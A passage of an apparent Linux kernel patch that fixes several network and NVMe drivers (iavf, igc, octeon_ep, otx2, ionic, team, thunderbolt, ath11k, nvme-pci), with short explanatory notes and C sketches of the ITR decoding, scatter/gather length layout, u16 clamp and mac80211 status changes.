+ 		adapter->num_vlan_filters++;
+-		adapter->aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
++		iavf_schedule_aq_request(adapter, IAVF_FLAG_AQ_ADD_VLAN_FILTER);
+ 	}
+ 
+ clearout:
+@@ -853,7 +851,7 @@ static void iavf_del_vlan(struct iavf_adapter *adapter, struct iavf_vlan vlan)
+ 	f = iavf_find_vlan(adapter, vlan);
+ 	if (f) {
+ 		f->state = IAVF_VLAN_REMOVE;
+-		adapter->aq_required |= IAVF_FLAG_AQ_DEL_VLAN_FILTER;
++		iavf_schedule_aq_request(adapter, IAVF_FLAG_AQ_DEL_VLAN_FILTER);
+ 	}
+ 
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+@@ -1433,7 +1431,8 @@ void iavf_down(struct iavf_adapter *adapter)
+ 	iavf_clear_fdir_filters(adapter);
+ 	iavf_clear_adv_rss_conf(adapter);
+ 
+-	if (!(adapter->flags & IAVF_FLAG_PF_COMMS_FAILED)) {
++	if (!(adapter->flags & IAVF_FLAG_PF_COMMS_FAILED) &&
++	    !(test_bit(__IAVF_IN_REMOVE_TASK, &adapter->crit_section))) {
+ 		/* cancel any current operation */
+ 		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+ 		/* Schedule operations to close down the HW. Don't wait
+diff --git a/drivers/net/ethernet/intel/igc/igc_ethtool.c b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+index 511fc3f412087..9166fde40c772 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ethtool.c
++++ b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+@@ -867,6 +867,18 @@ static void igc_ethtool_get_stats(struct net_device *netdev,
+ 	spin_unlock(&adapter->stats64_lock);
+ }
+ 
++static int igc_ethtool_get_previous_rx_coalesce(struct igc_adapter *adapter)
++{
++	return (adapter->rx_itr_setting <= 3) ?
++		adapter->rx_itr_setting : adapter->rx_itr_setting >> 2;
++}
++
++static int igc_ethtool_get_previous_tx_coalesce(struct igc_adapter *adapter)
++{
++	return (adapter->tx_itr_setting <= 3) ?
++		adapter->tx_itr_setting : adapter->tx_itr_setting >> 2;
++}
++
+ static int igc_ethtool_get_coalesce(struct net_device *netdev,
+ 				    struct ethtool_coalesce *ec,
+ 				    struct kernel_ethtool_coalesce *kernel_coal,
+@@ -874,17 +886,8 @@ static int igc_ethtool_get_coalesce(struct net_device *netdev,
+ {
+ 	struct igc_adapter *adapter = netdev_priv(netdev);
+ 
+-	if (adapter->rx_itr_setting <= 3)
+-		ec->rx_coalesce_usecs = adapter->rx_itr_setting;
+-	else
+-		ec->rx_coalesce_usecs = adapter->rx_itr_setting >> 2;
+-
+-	if (!(adapter->flags & IGC_FLAG_QUEUE_PAIRS)) {
+-		if (adapter->tx_itr_setting <= 3)
+-			ec->tx_coalesce_usecs = adapter->tx_itr_setting;
+-		else
+-			ec->tx_coalesce_usecs = adapter->tx_itr_setting >> 2;
+-	}
++	ec->rx_coalesce_usecs = igc_ethtool_get_previous_rx_coalesce(adapter);
++	ec->tx_coalesce_usecs = igc_ethtool_get_previous_tx_coalesce(adapter);
+ 
+ 	return 0;
+ }
+@@ -909,8 +912,12 @@ static int igc_ethtool_set_coalesce(struct net_device *netdev,
+ 	    ec->tx_coalesce_usecs == 2)
+ 		return -EINVAL;
+ 
+-	if ((adapter->flags & IGC_FLAG_QUEUE_PAIRS) && ec->tx_coalesce_usecs)
++	if ((adapter->flags & IGC_FLAG_QUEUE_PAIRS) &&
++	    ec->tx_coalesce_usecs != igc_ethtool_get_previous_tx_coalesce(adapter)) {
++		NL_SET_ERR_MSG_MOD(extack,
++				   "Queue Pair mode enabled, both Rx and Tx coalescing controlled by rx-usecs");
+ 		return -EINVAL;
++	}
+ 
+ 	/* If ITR is disabled, disable DMAC */
+ 	if (ec->rx_coalesce_usecs == 0) {
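
Both new igc helpers decode the stored ITR setting the same way the removed
open-coded branches did: values up to 3 are special control codes reported
verbatim, and anything larger is a register value counting 4 us units, hence
the >> 2 to get microseconds. The shared encoding, reduced to one sketch:

/* Sketch: ITR settings 0..3 are control codes reported as-is; larger
 * values are register counts in 4 usec units, so >> 2 yields usecs.
 */
static u32 itr_setting_to_usecs(u32 setting)
{
	return setting <= 3 ? setting : setting >> 2;
}
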
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 2f3947cf513bd..1ac836a55cd31 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -6322,7 +6322,7 @@ static int igc_xdp_xmit(struct net_device *dev, int num_frames,
+ 	struct igc_ring *ring;
+ 	int i, drops;
+ 
+-	if (unlikely(test_bit(__IGC_DOWN, &adapter->state)))
++	if (unlikely(!netif_carrier_ok(dev)))
+ 		return -ENETDOWN;
+ 
+ 	if (unlikely(flags & ~XDP_XMIT_FLAGS_MASK))
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+index d4ec46d1c8cfb..61354f7985035 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+@@ -726,13 +726,13 @@ static netdev_tx_t octep_start_xmit(struct sk_buff *skb,
+ dma_map_sg_err:
+ 	if (si > 0) {
+ 		dma_unmap_single(iq->dev, sglist[0].dma_ptr[0],
+-				 sglist[0].len[0], DMA_TO_DEVICE);
+-		sglist[0].len[0] = 0;
++				 sglist[0].len[3], DMA_TO_DEVICE);
++		sglist[0].len[3] = 0;
+ 	}
+ 	while (si > 1) {
+ 		dma_unmap_page(iq->dev, sglist[si >> 2].dma_ptr[si & 3],
+-			       sglist[si >> 2].len[si & 3], DMA_TO_DEVICE);
+-		sglist[si >> 2].len[si & 3] = 0;
++			       sglist[si >> 2].len[3 - (si & 3)], DMA_TO_DEVICE);
++		sglist[si >> 2].len[3 - (si & 3)] = 0;
+ 		si--;
+ 	}
+ 	tx_buffer->gather = 0;
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_tx.c b/drivers/net/ethernet/marvell/octeon_ep/octep_tx.c
+index 5a520d37bea02..d0adb82d65c31 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_tx.c
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_tx.c
+@@ -69,12 +69,12 @@ int octep_iq_process_completions(struct octep_iq *iq, u16 budget)
+ 		compl_sg++;
+ 
+ 		dma_unmap_single(iq->dev, tx_buffer->sglist[0].dma_ptr[0],
+-				 tx_buffer->sglist[0].len[0], DMA_TO_DEVICE);
++				 tx_buffer->sglist[0].len[3], DMA_TO_DEVICE);
+ 
+ 		i = 1; /* entry 0 is main skb, unmapped above */
+ 		while (frags--) {
+ 			dma_unmap_page(iq->dev, tx_buffer->sglist[i >> 2].dma_ptr[i & 3],
+-				       tx_buffer->sglist[i >> 2].len[i & 3], DMA_TO_DEVICE);
++				       tx_buffer->sglist[i >> 2].len[3 - (i & 3)], DMA_TO_DEVICE);
+ 			i++;
+ 		}
+ 
+@@ -131,13 +131,13 @@ static void octep_iq_free_pending(struct octep_iq *iq)
+ 
+ 		dma_unmap_single(iq->dev,
+ 				 tx_buffer->sglist[0].dma_ptr[0],
+-				 tx_buffer->sglist[0].len[0],
++				 tx_buffer->sglist[0].len[3],
+ 				 DMA_TO_DEVICE);
+ 
+ 		i = 1; /* entry 0 is main skb, unmapped above */
+ 		while (frags--) {
+ 			dma_unmap_page(iq->dev, tx_buffer->sglist[i >> 2].dma_ptr[i & 3],
+-				       tx_buffer->sglist[i >> 2].len[i & 3], DMA_TO_DEVICE);
++				       tx_buffer->sglist[i >> 2].len[3 - (i & 3)], DMA_TO_DEVICE);
+ 			i++;
+ 		}
+ 
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_tx.h b/drivers/net/ethernet/marvell/octeon_ep/octep_tx.h
+index 2ef57980eb47b..21e75ff9f5e71 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_tx.h
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_tx.h
+@@ -17,7 +17,21 @@
+ #define TX_BUFTYPE_NET_SG        2
+ #define NUM_TX_BUFTYPES          3
+ 
+-/* Hardware format for Scatter/Gather list */
++/* Hardware format for Scatter/Gather list
++ *
++ * 63      48|47     32|31     16|15       0
++ * -----------------------------------------
++ * |  Len 0  |  Len 1  |  Len 2  |  Len 3  |
++ * -----------------------------------------
++ * |                Ptr 0                  |
++ * -----------------------------------------
++ * |                Ptr 1                  |
++ * -----------------------------------------
++ * |                Ptr 2                  |
++ * -----------------------------------------
++ * |                Ptr 3                  |
++ * -----------------------------------------
++ */
+ struct octep_tx_sglist_desc {
+ 	u16 len[4];
+ 	dma_addr_t dma_ptr[4];
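
The new diagram explains the index changes in the unmap paths above: within
each 64-bit word the four 16-bit lengths are packed most-significant first
(Len 0 in bits 63:48), so on a little-endian host the u16 len[4] overlay
stores logical length i at array slot 3 - (i & 3) of word i >> 2, while the
pointers occupy whole words and keep the natural i & 3 index. Sketched as
helpers (the function names are illustrative):

#include <linux/types.h>

struct octep_tx_sglist_desc {	/* as declared in the hunk above */
	u16 len[4];
	dma_addr_t dma_ptr[4];
};

/* Lengths are packed MSB-first inside each 64-bit word. */
static inline u16 sg_frag_len(const struct octep_tx_sglist_desc *sg, int i)
{
	return sg[i >> 2].len[3 - (i & 3)];
}

/* Pointers are full 64-bit words and keep their natural order. */
static inline dma_addr_t sg_frag_ptr(const struct octep_tx_sglist_desc *sg, int i)
{
	return sg[i >> 2].dma_ptr[i & 3];
}
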
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index 7af223b0a37f5..5704fb75fa477 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -29,7 +29,8 @@
+ static bool otx2_xdp_rcv_pkt_handler(struct otx2_nic *pfvf,
+ 				     struct bpf_prog *prog,
+ 				     struct nix_cqe_rx_s *cqe,
+-				     struct otx2_cq_queue *cq);
++				     struct otx2_cq_queue *cq,
++				     bool *need_xdp_flush);
+ 
+ static int otx2_nix_cq_op_status(struct otx2_nic *pfvf,
+ 				 struct otx2_cq_queue *cq)
+@@ -340,7 +341,7 @@ static bool otx2_check_rcv_errors(struct otx2_nic *pfvf,
+ static void otx2_rcv_pkt_handler(struct otx2_nic *pfvf,
+ 				 struct napi_struct *napi,
+ 				 struct otx2_cq_queue *cq,
+-				 struct nix_cqe_rx_s *cqe)
++				 struct nix_cqe_rx_s *cqe, bool *need_xdp_flush)
+ {
+ 	struct nix_rx_parse_s *parse = &cqe->parse;
+ 	struct nix_rx_sg_s *sg = &cqe->sg;
+@@ -356,7 +357,7 @@ static void otx2_rcv_pkt_handler(struct otx2_nic *pfvf,
+ 	}
+ 
+ 	if (pfvf->xdp_prog)
+-		if (otx2_xdp_rcv_pkt_handler(pfvf, pfvf->xdp_prog, cqe, cq))
++		if (otx2_xdp_rcv_pkt_handler(pfvf, pfvf->xdp_prog, cqe, cq, need_xdp_flush))
+ 			return;
+ 
+ 	skb = napi_get_frags(napi);
+@@ -389,6 +390,7 @@ static int otx2_rx_napi_handler(struct otx2_nic *pfvf,
+ 				struct napi_struct *napi,
+ 				struct otx2_cq_queue *cq, int budget)
+ {
++	bool need_xdp_flush = false;
+ 	struct nix_cqe_rx_s *cqe;
+ 	int processed_cqe = 0;
+ 
+@@ -410,13 +412,15 @@ process_cqe:
+ 		cq->cq_head++;
+ 		cq->cq_head &= (cq->cqe_cnt - 1);
+ 
+-		otx2_rcv_pkt_handler(pfvf, napi, cq, cqe);
++		otx2_rcv_pkt_handler(pfvf, napi, cq, cqe, &need_xdp_flush);
+ 
+ 		cqe->hdr.cqe_type = NIX_XQE_TYPE_INVALID;
+ 		cqe->sg.seg_addr = 0x00;
+ 		processed_cqe++;
+ 		cq->pend_cqe--;
+ 	}
++	if (need_xdp_flush)
++		xdp_do_flush();
+ 
+ 	/* Free CQEs to HW */
+ 	otx2_write64(pfvf, NIX_LF_CQ_OP_DOOR,
+@@ -1323,7 +1327,8 @@ bool otx2_xdp_sq_append_pkt(struct otx2_nic *pfvf, u64 iova, int len, u16 qidx)
+ static bool otx2_xdp_rcv_pkt_handler(struct otx2_nic *pfvf,
+ 				     struct bpf_prog *prog,
+ 				     struct nix_cqe_rx_s *cqe,
+-				     struct otx2_cq_queue *cq)
++				     struct otx2_cq_queue *cq,
++				     bool *need_xdp_flush)
+ {
+ 	unsigned char *hard_start, *data;
+ 	int qidx = cq->cq_idx;
+@@ -1360,8 +1365,10 @@ static bool otx2_xdp_rcv_pkt_handler(struct otx2_nic *pfvf,
+ 
+ 		otx2_dma_unmap_page(pfvf, iova, pfvf->rbsize,
+ 				    DMA_FROM_DEVICE);
+-		if (!err)
++		if (!err) {
++			*need_xdp_flush = true;
+ 			return true;
++		}
+ 		put_page(page);
+ 		break;
+ 	default:
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.h b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+index ad8a2a4453b76..93a4258421667 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.h
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+@@ -180,6 +180,7 @@ typedef void (*ionic_desc_cb)(struct ionic_queue *q,
+ 			      struct ionic_desc_info *desc_info,
+ 			      struct ionic_cq_info *cq_info, void *cb_arg);
+ 
++#define IONIC_MAX_BUF_LEN			((u16)-1)
+ #define IONIC_PAGE_SIZE				PAGE_SIZE
+ #define IONIC_PAGE_SPLIT_SZ			(PAGE_SIZE / 2)
+ #define IONIC_PAGE_GFP_MASK			(GFP_ATOMIC | __GFP_NOWARN |\
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_txrx.c b/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
+index f8f5eb1307681..4684b9f194a68 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
+@@ -207,7 +207,8 @@ static struct sk_buff *ionic_rx_frags(struct ionic_queue *q,
+ 			return NULL;
+ 		}
+ 
+-		frag_len = min_t(u16, len, IONIC_PAGE_SIZE - buf_info->page_offset);
++		frag_len = min_t(u16, len, min_t(u32, IONIC_MAX_BUF_LEN,
++						 IONIC_PAGE_SIZE - buf_info->page_offset));
+ 		len -= frag_len;
+ 
+ 		dma_sync_single_for_cpu(dev,
+@@ -444,7 +445,8 @@ void ionic_rx_fill(struct ionic_queue *q)
+ 
+ 		/* fill main descriptor - buf[0] */
+ 		desc->addr = cpu_to_le64(buf_info->dma_addr + buf_info->page_offset);
+-		frag_len = min_t(u16, len, IONIC_PAGE_SIZE - buf_info->page_offset);
++		frag_len = min_t(u16, len, min_t(u32, IONIC_MAX_BUF_LEN,
++						 IONIC_PAGE_SIZE - buf_info->page_offset));
+ 		desc->len = cpu_to_le16(frag_len);
+ 		remain_len -= frag_len;
+ 		buf_info++;
+@@ -463,7 +465,9 @@ void ionic_rx_fill(struct ionic_queue *q)
+ 			}
+ 
+ 			sg_elem->addr = cpu_to_le64(buf_info->dma_addr + buf_info->page_offset);
+-			frag_len = min_t(u16, remain_len, IONIC_PAGE_SIZE - buf_info->page_offset);
++			frag_len = min_t(u16, remain_len, min_t(u32, IONIC_MAX_BUF_LEN,
++								IONIC_PAGE_SIZE -
++								buf_info->page_offset));
+ 			sg_elem->len = cpu_to_le16(frag_len);
+ 			remain_len -= frag_len;
+ 			buf_info++;
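
IONIC_MAX_BUF_LEN guards a u16 truncation: with 64K pages and a page_offset
of 0, IONIC_PAGE_SIZE - page_offset is 65536, which wraps to 0 when narrowed
to the u16 descriptor length. Clamping to (u16)-1 inside a u32 min_t first
keeps the arithmetic wide enough. A stand-alone sketch of the clamp:

#include <linux/minmax.h>
#include <linux/types.h>

/* Sketch: clamp an RX buffer length so it cannot wrap the u16 length
 * field; the min against 65535 ((u16)-1) is done in u32 on purpose.
 */
static u16 rx_frag_len(u32 wanted, u32 page_size, u32 page_offset)
{
	u32 avail = min_t(u32, 65535, page_size - page_offset);

	return min_t(u32, wanted, avail);
}
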
+diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c
+index 921ca59822b0f..556b2d1cd2aca 100644
+--- a/drivers/net/team/team.c
++++ b/drivers/net/team/team.c
+@@ -2127,7 +2127,12 @@ static const struct ethtool_ops team_ethtool_ops = {
+ static void team_setup_by_port(struct net_device *dev,
+ 			       struct net_device *port_dev)
+ {
+-	dev->header_ops	= port_dev->header_ops;
++	struct team *team = netdev_priv(dev);
++
++	if (port_dev->type == ARPHRD_ETHER)
++		dev->header_ops	= team->header_ops_cache;
++	else
++		dev->header_ops	= port_dev->header_ops;
+ 	dev->type = port_dev->type;
+ 	dev->hard_header_len = port_dev->hard_header_len;
+ 	dev->needed_headroom = port_dev->needed_headroom;
+@@ -2174,8 +2179,11 @@ static int team_dev_type_check_change(struct net_device *dev,
+ 
+ static void team_setup(struct net_device *dev)
+ {
++	struct team *team = netdev_priv(dev);
++
+ 	ether_setup(dev);
+ 	dev->max_mtu = ETH_MAX_MTU;
++	team->header_ops_cache = dev->header_ops;
+ 
+ 	dev->netdev_ops = &team_netdev_ops;
+ 	dev->ethtool_ops = &team_ethtool_ops;
+diff --git a/drivers/net/thunderbolt.c b/drivers/net/thunderbolt.c
+index 6312f67f260e0..5966e36875def 100644
+--- a/drivers/net/thunderbolt.c
++++ b/drivers/net/thunderbolt.c
+@@ -1005,12 +1005,11 @@ static bool tbnet_xmit_csum_and_map(struct tbnet *net, struct sk_buff *skb,
+ 		*tucso = ~csum_tcpudp_magic(ip_hdr(skb)->saddr,
+ 					    ip_hdr(skb)->daddr, 0,
+ 					    ip_hdr(skb)->protocol, 0);
+-	} else if (skb_is_gso_v6(skb)) {
++	} else if (skb_is_gso(skb) && skb_is_gso_v6(skb)) {
+ 		tucso = dest + ((void *)&(tcp_hdr(skb)->check) - data);
+ 		*tucso = ~csum_ipv6_magic(&ipv6_hdr(skb)->saddr,
+ 					  &ipv6_hdr(skb)->daddr, 0,
+ 					  IPPROTO_TCP, 0);
+-		return false;
+ 	} else if (protocol == htons(ETH_P_IPV6)) {
+ 		tucso = dest + skb_checksum_start_offset(skb) + skb->csum_offset;
+ 		*tucso = ~csum_ipv6_magic(&ipv6_hdr(skb)->saddr,
+diff --git a/drivers/net/wireless/ath/ath11k/dp.h b/drivers/net/wireless/ath/ath11k/dp.h
+index be9eafc872b3b..232fd2e638bf6 100644
+--- a/drivers/net/wireless/ath/ath11k/dp.h
++++ b/drivers/net/wireless/ath/ath11k/dp.h
+@@ -303,12 +303,16 @@ struct ath11k_dp {
+ 
+ #define HTT_TX_WBM_COMP_STATUS_OFFSET 8
+ 
++#define HTT_INVALID_PEER_ID	0xffff
++
+ /* HTT tx completion is overlaid in wbm_release_ring */
+ #define HTT_TX_WBM_COMP_INFO0_STATUS		GENMASK(12, 9)
+ #define HTT_TX_WBM_COMP_INFO0_REINJECT_REASON	GENMASK(16, 13)
+ #define HTT_TX_WBM_COMP_INFO0_REINJECT_REASON	GENMASK(16, 13)
+ 
+ #define HTT_TX_WBM_COMP_INFO1_ACK_RSSI		GENMASK(31, 24)
++#define HTT_TX_WBM_COMP_INFO2_SW_PEER_ID	GENMASK(15, 0)
++#define HTT_TX_WBM_COMP_INFO2_VALID		BIT(21)
+ 
+ struct htt_tx_wbm_completion {
+ 	u32 info0;
+diff --git a/drivers/net/wireless/ath/ath11k/dp_tx.c b/drivers/net/wireless/ath/ath11k/dp_tx.c
+index 8afbba2369354..cd24488612454 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_tx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_tx.c
+@@ -316,10 +316,12 @@ ath11k_dp_tx_htt_tx_complete_buf(struct ath11k_base *ab,
+ 				 struct dp_tx_ring *tx_ring,
+ 				 struct ath11k_dp_htt_wbm_tx_status *ts)
+ {
++	struct ieee80211_tx_status status = { 0 };
+ 	struct sk_buff *msdu;
+ 	struct ieee80211_tx_info *info;
+ 	struct ath11k_skb_cb *skb_cb;
+ 	struct ath11k *ar;
++	struct ath11k_peer *peer;
+ 
+ 	spin_lock(&tx_ring->tx_idr_lock);
+ 	msdu = idr_remove(&tx_ring->txbuf_idr, ts->msdu_id);
+@@ -341,6 +343,11 @@ ath11k_dp_tx_htt_tx_complete_buf(struct ath11k_base *ab,
+ 
+ 	dma_unmap_single(ab->dev, skb_cb->paddr, msdu->len, DMA_TO_DEVICE);
+ 
++	if (!skb_cb->vif) {
++		ieee80211_free_txskb(ar->hw, msdu);
++		return;
++	}
++
+ 	memset(&info->status, 0, sizeof(info->status));
+ 
+ 	if (ts->acked) {
+@@ -355,7 +362,23 @@ ath11k_dp_tx_htt_tx_complete_buf(struct ath11k_base *ab,
+ 		}
+ 	}
+ 
+-	ieee80211_tx_status(ar->hw, msdu);
++	spin_lock_bh(&ab->base_lock);
++	peer = ath11k_peer_find_by_id(ab, ts->peer_id);
++	if (!peer || !peer->sta) {
++		ath11k_dbg(ab, ATH11K_DBG_DATA,
++			   "dp_tx: failed to find the peer with peer_id %d\n",
++			    ts->peer_id);
++		spin_unlock_bh(&ab->base_lock);
++		ieee80211_free_txskb(ar->hw, msdu);
++		return;
++	}
++	spin_unlock_bh(&ab->base_lock);
++
++	status.sta = peer->sta;
++	status.info = info;
++	status.skb = msdu;
++
++	ieee80211_tx_status_ext(ar->hw, &status);
+ }
+ 
+ static void
+@@ -379,7 +402,15 @@ ath11k_dp_tx_process_htt_tx_complete(struct ath11k_base *ab,
+ 		ts.msdu_id = msdu_id;
+ 		ts.ack_rssi = FIELD_GET(HTT_TX_WBM_COMP_INFO1_ACK_RSSI,
+ 					status_desc->info1);
++
++		if (FIELD_GET(HTT_TX_WBM_COMP_INFO2_VALID, status_desc->info2))
++			ts.peer_id = FIELD_GET(HTT_TX_WBM_COMP_INFO2_SW_PEER_ID,
++					       status_desc->info2);
++		else
++			ts.peer_id = HTT_INVALID_PEER_ID;
++
+ 		ath11k_dp_tx_htt_tx_complete_buf(ab, tx_ring, &ts);
++
+ 		break;
+ 	case HAL_WBM_REL_HTT_TX_COMP_STATUS_REINJ:
+ 	case HAL_WBM_REL_HTT_TX_COMP_STATUS_INSPECT:
+@@ -535,12 +566,12 @@ static void ath11k_dp_tx_complete_msdu(struct ath11k *ar,
+ 	dma_unmap_single(ab->dev, skb_cb->paddr, msdu->len, DMA_TO_DEVICE);
+ 
+ 	if (unlikely(!rcu_access_pointer(ab->pdevs_active[ar->pdev_idx]))) {
+-		dev_kfree_skb_any(msdu);
++		ieee80211_free_txskb(ar->hw, msdu);
+ 		return;
+ 	}
+ 
+ 	if (unlikely(!skb_cb->vif)) {
+-		dev_kfree_skb_any(msdu);
++		ieee80211_free_txskb(ar->hw, msdu);
+ 		return;
+ 	}
+ 
+@@ -593,7 +624,7 @@ static void ath11k_dp_tx_complete_msdu(struct ath11k *ar,
+ 			   "dp_tx: failed to find the peer with peer_id %d\n",
+ 			    ts->peer_id);
+ 		spin_unlock_bh(&ab->base_lock);
+-		dev_kfree_skb_any(msdu);
++		ieee80211_free_txskb(ar->hw, msdu);
+ 		return;
+ 	}
+ 	arsta = (struct ath11k_sta *)peer->sta->drv_priv;
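
The ath11k hunks switch completions over to ieee80211_tx_status_ext() so the
status can be tied to the station resolved from the HTT peer_id, and they
consistently free skbs with ieee80211_free_txskb() so mac80211 can account
the loss. A minimal sketch of the extended-status call (report_tx_status()
is an illustrative name):

#include <net/mac80211.h>

/* Sketch: completion with an explicit station, as in the hunk above. */
static void report_tx_status(struct ieee80211_hw *hw, struct sk_buff *skb,
			     struct ieee80211_sta *sta)
{
	struct ieee80211_tx_status status = { 0 };

	status.sta = sta;			/* station resolved via peer_id */
	status.info = IEEE80211_SKB_CB(skb);
	status.skb = skb;

	ieee80211_tx_status_ext(hw, &status);	/* consumes the skb */
}
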
+diff --git a/drivers/net/wireless/ath/ath11k/dp_tx.h b/drivers/net/wireless/ath/ath11k/dp_tx.h
+index e87d65bfbf06e..68a21ea9b9346 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_tx.h
++++ b/drivers/net/wireless/ath/ath11k/dp_tx.h
+@@ -13,6 +13,7 @@ struct ath11k_dp_htt_wbm_tx_status {
+ 	u32 msdu_id;
+ 	bool acked;
+ 	int ack_rssi;
++	u16 peer_id;
+ };
+ 
+ void ath11k_dp_tx_update_txcompl(struct ath11k *ar, struct hal_tx_status *ts);
+diff --git a/drivers/nvme/host/fc.c b/drivers/nvme/host/fc.c
+index 6c3d469eed7e3..177a365b8ec55 100644
+--- a/drivers/nvme/host/fc.c
++++ b/drivers/nvme/host/fc.c
+@@ -1911,7 +1911,7 @@ char *nvme_fc_io_getuuid(struct nvmefc_fcp_req *req)
+ 	struct nvme_fc_fcp_op *op = fcp_req_to_fcp_op(req);
+ 	struct request *rq = op->rq;
+ 
+-	if (!IS_ENABLED(CONFIG_BLK_CGROUP_FC_APPID) || !rq->bio)
++	if (!IS_ENABLED(CONFIG_BLK_CGROUP_FC_APPID) || !rq || !rq->bio)
+ 		return NULL;
+ 	return blkcg_get_fc_appid(rq->bio);
+ }
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index b30269f5e68fb..64990a2cfd0a7 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -392,14 +392,6 @@ static int nvme_pci_npages_sgl(void)
+ 			NVME_CTRL_PAGE_SIZE);
+ }
+ 
+-static size_t nvme_pci_iod_alloc_size(void)
+-{
+-	size_t npages = max(nvme_pci_npages_prp(), nvme_pci_npages_sgl());
+-
+-	return sizeof(__le64 *) * npages +
+-		sizeof(struct scatterlist) * NVME_MAX_SEGS;
+-}
+-
+ static int nvme_admin_init_hctx(struct blk_mq_hw_ctx *hctx, void *data,
+ 				unsigned int hctx_idx)
+ {
+@@ -2775,6 +2767,22 @@ static void nvme_release_prp_pools(struct nvme_dev *dev)
+ 	dma_pool_destroy(dev->prp_small_pool);
+ }
+ 
++static int nvme_pci_alloc_iod_mempool(struct nvme_dev *dev)
++{
++	size_t npages = max(nvme_pci_npages_prp(), nvme_pci_npages_sgl());
++	size_t alloc_size = sizeof(__le64 *) * npages +
++			    sizeof(struct scatterlist) * NVME_MAX_SEGS;
++
++	WARN_ON_ONCE(alloc_size > PAGE_SIZE);
++	dev->iod_mempool = mempool_create_node(1,
++			mempool_kmalloc, mempool_kfree,
++			(void *)alloc_size, GFP_KERNEL,
++			dev_to_node(dev->dev));
++	if (!dev->iod_mempool)
++		return -ENOMEM;
++	return 0;
++}
++
+ static void nvme_free_tagset(struct nvme_dev *dev)
+ {
+ 	if (dev->tagset.tags)
+@@ -2782,6 +2790,7 @@ static void nvme_free_tagset(struct nvme_dev *dev)
+ 	dev->ctrl.tagset = NULL;
+ }
+ 
++/* pairs with nvme_pci_alloc_dev */
+ static void nvme_pci_free_ctrl(struct nvme_ctrl *ctrl)
+ {
+ 	struct nvme_dev *dev = to_nvme_dev(ctrl);
+@@ -3098,20 +3107,20 @@ static void nvme_async_probe(void *data, async_cookie_t cookie)
+ 	nvme_put_ctrl(&dev->ctrl);
+ }
+ 
+-static int nvme_probe(struct pci_dev *pdev, const struct pci_device_id *id)
++static struct nvme_dev *nvme_pci_alloc_dev(struct pci_dev *pdev,
++		const struct pci_device_id *id)
+ {
+-	int node, result = -ENOMEM;
+-	struct nvme_dev *dev;
+ 	unsigned long quirks = id->driver_data;
+-	size_t alloc_size;
+-
+-	node = dev_to_node(&pdev->dev);
+-	if (node == NUMA_NO_NODE)
+-		set_dev_node(&pdev->dev, first_memory_node);
++	int node = dev_to_node(&pdev->dev);
++	struct nvme_dev *dev;
++	int ret = -ENOMEM;
+ 
+ 	dev = kzalloc_node(sizeof(*dev), GFP_KERNEL, node);
+ 	if (!dev)
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
++	INIT_WORK(&dev->ctrl.reset_work, nvme_reset_work);
++	INIT_WORK(&dev->remove_work, nvme_remove_dead_ctrl_work);
++	mutex_init(&dev->shutdown_lock);
+ 
+ 	dev->nr_write_queues = write_queues;
+ 	dev->nr_poll_queues = poll_queues;
+@@ -3119,25 +3128,11 @@ static int nvme_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	dev->queues = kcalloc_node(dev->nr_allocated_queues,
+ 			sizeof(struct nvme_queue), GFP_KERNEL, node);
+ 	if (!dev->queues)
+-		goto free;
++		goto out_free_dev;
+ 
+ 	dev->dev = get_device(&pdev->dev);
+-	pci_set_drvdata(pdev, dev);
+-
+-	result = nvme_dev_map(dev);
+-	if (result)
+-		goto put_pci;
+-
+-	INIT_WORK(&dev->ctrl.reset_work, nvme_reset_work);
+-	INIT_WORK(&dev->remove_work, nvme_remove_dead_ctrl_work);
+-	mutex_init(&dev->shutdown_lock);
+-
+-	result = nvme_setup_prp_pools(dev);
+-	if (result)
+-		goto unmap;
+ 
+ 	quirks |= check_vendor_combination_bug(pdev);
+-
+ 	if (!noacpi && acpi_storage_d3(&pdev->dev)) {
+ 		/*
+ 		 * Some systems use a bios work around to ask for D3 on
+@@ -3147,46 +3142,54 @@ static int nvme_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 			 "platform quirk: setting simple suspend\n");
+ 		quirks |= NVME_QUIRK_SIMPLE_SUSPEND;
+ 	}
